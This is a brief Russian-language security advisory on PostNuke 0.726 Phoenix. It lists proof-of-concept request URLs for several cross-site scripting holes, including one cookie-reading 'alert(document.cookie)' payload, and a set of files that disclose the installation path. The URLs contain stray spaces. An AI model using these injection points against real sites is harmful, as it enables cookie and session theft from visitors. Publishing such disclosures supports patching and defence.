Программа: PostNuke 0.726 Phoenix 

Несколько уязвимостей обнаружено в PostNuke. Удаленный пользователь может определить инсталляционный путь. Удаленный пользователь может выполнить XSS нападение. 

1. XSS: 

http://localhost/postnuke0726/modules.php?op=modl oad&name=Downloads&file=index&req=
ratedownload&ttitle=x&lid=>[xss  code here]
http://localhost/postnuke0726/modules.php?op=modl oad&name=Downloads&file=index&req=
searc h&query=>[xss code here]
http://localhost/postnuke0726/modules.php?op=modl oad&name=Web_Links&file=index&req=
search&query=>[xss code here]
http://localhost/postnuke0726/javascript/openwindow. php?hlpfile=x<html><body>[xss code here]
http://localhost/postnuke0726/javascript/openwindow. php?hlpf ile=x<html><body%20onload=
alert(document.cookie);>

2. Раскрытие инсталляционного пути: 

http://localhost/postnuke0726/includes/ blocks/finclude.php 
http://localhost/postnuke0726/pnadodb/ drivers/adodb-access.inc.php
http://localhost/postnuke0726/modules/ NS-NewUser/user.php
http://localhost/postnuke0726/modules/ NS-Your_Account/user/links/links.changehome.php
http://localhost/postnuke0726/modules/ NS-Your_Account/user/case/case.changehome.php?op=edithome
http://localhost/ postnuke0726/modules/ NS-LostPassword/user.php
http://localhost/postnuke0726/modules/ NS-Multisites/chgtheme.inc.php
http://localhost/postnuke0726/modules/ NS-Multisit es/head.inc.php
http://localhost/postnuke0726/modules/ NS-Multisites/print.inc.php
http://localhost/postnuke0726/modules/ NS-User/tools.php
http://localhost/postnu ke0726/modules/ NS-User/user.php



Оставить мнение